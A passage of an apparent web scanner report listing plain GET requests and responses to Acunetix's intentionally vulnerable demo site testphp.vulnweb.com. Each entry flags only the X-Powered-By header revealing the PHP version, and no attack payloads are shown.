Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:19:16 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1285 |
Response Body - size: 1,285 bytes. |
<iteminfo><name>lyzae</name><description><p>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:51 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 323 |
Response Body - size: 323 bytes. |
<iteminfo><name>Posters</name><description>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:19:09 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 325 |
Response Body - size: 325 bytes. |
<iteminfo><name>Paintings</name><description>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:19:26 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 324 |
Response Body - size: 324 bytes. |
<iteminfo><name>Stickers</name><description>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:19:35 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 324 |
Response Body - size: 324 bytes. |
<iteminfo><name>Graffity</name><description>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</description></iteminfo> |
URL | http://testphp.vulnweb.com/artists.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5328 |
Response Body - size: 5,328 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class='story'><a href='artists.php?artist=1'><h3>r4w8173</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=2'><h3>Blad3</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div><div class='story'><a href='artists.php?artist=3'><h3>lyzae</h3></a><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6251 |
Response Body - size: 6,251 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: r4w8173</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=1'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=1','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: Blad3</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=2'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: lyzae</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=3'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> 